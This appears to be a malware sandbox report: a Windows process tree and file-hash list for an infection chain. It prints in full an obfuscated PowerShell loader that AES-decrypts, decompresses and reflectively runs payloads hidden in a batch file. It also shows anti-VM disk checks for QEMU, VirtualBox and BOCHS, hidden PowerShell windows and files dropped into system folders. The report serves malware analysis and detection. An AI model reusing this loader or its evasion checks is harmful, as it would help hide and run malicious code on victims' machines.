$iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));3⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1708 -s 23804⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:5036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:4740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2468
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:2192
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵PID:2156
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:5020
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵PID:1364
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));5⤵PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1664 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1664 -s 23686⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2848
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1664 -s 24486⤵PID:4220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:3400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1188
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\tSVFjN.exe"C:\Windows\$nya-onimai2\tSVFjN.exe"2⤵
- Executes dropped EXE
PID:2752 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3200
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3460
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3892
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3952
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4092
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3772
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1484
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3096
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3156
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3352 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1708 -ip 17082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2836
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 1664 -ip 16642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4644
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 1664 -ip 16642⤵PID:1152
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD59f1c158f60f37f4839df66005f69a8e8
SHA1ef19cdd6506541e0af846bbbb8335ea13862209f
SHA256d35e2fdf351cda98af1bb1d06e0ea98fa9234cf94a11c5895caf198d314387e5
SHA5127810855093216b862047323eb106d0d5efc0b10969362956d8d55e7a52ba898e5f036305fc96f886674119e1116ff51d7799729dcb32e5b273188f02c9a2ae91
-
Filesize
13KB
MD5537451fcbfd6c6b845536d72da3b24df
SHA1505b12bbab46be46bbd02c38a4c91e781f04f887
SHA2566ecf666e5cf9d4bf9b9e14258f6f93d674b086dd2f634221cfafb3b2541d6470
SHA51204766ae851adb1b62b64abbf9927301630f9940a92fbe2bbd6d52d5255afdc631f47c48945a74e916f1c0a28be922083b04c53216cf5f169593f7abd208db23a
-
Filesize
35KB
MD5b3564fc3dbb39fb80354f7c515d76600
SHA17b904269af67886a04d484688177ecc7e46ff892
SHA2569baff86e19151a609cdb33c24ac99cbcef29ae42cbca6d580cfe17dae5d44626
SHA512967cdb00d42d809a4b5e04e54cbf7da13db3c54e2697d7b69107d6a3089b7bb48ac63325d4ad4f724cea5194f7b156e536979e94399aed98eba96d0e578315fb
-
Filesize
13KB
MD57b551aa3e639d47e8aa91d9d56405e59
SHA1460ad39c93c308c0b3a501c04c7b9d45a7351449
SHA25699475ab6cb5d3f08fd31e056aa99e67509951763e1bdf2a46ebcc94d9b67dc92
SHA512320c673bc1983821390250f0a4e07f4e1fe88f8dc989c1076eb16d6253389ae662170dbcd4c3e82281e8d2b6f544f6d387838f3b7988055fb3bcea583581dcfc
-
Filesize
3KB
MD517a17db79c19d4aa20da768f2f11e0f6
SHA178a73b83c002d4f3b51b69fc3cdf9cf0167fedc1
SHA256e9819d3ecd5796772aaeb07dc1c5da0563d3a1bf9422da03b0514b95ffad8289
SHA5127a450bd6e8767e16345db6745f162de8e948fb7b65dc5aa1b27e9c395f7657a5fc8a6becbe7e5d332c3c7480783474936e6d21f6421454d8fbe35f2f946043be
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD538d82e4dea1c1bf49bf8ec02767bf6c5
SHA1d047341a619d44c61fe80a9591f87a3806699dee
SHA256d753c949c37d2cdb08f9639a37f79c34c5c65eaebe6691bcae1b02d5585b6ee1
SHA512e30c6cf10376b148552fdb69ad994a0369d6c121dc193b4e11dbd7f13004461fe7e292aa4eb1edd0325a8dd52c86f159bb0835e9331ecc0cd050c83935a4a2a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.3MB
MD51bec1098946595a03fa067a3ef7ce292
SHA189cfb4a2f8800f1b944d906d959639907672317d
SHA256a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082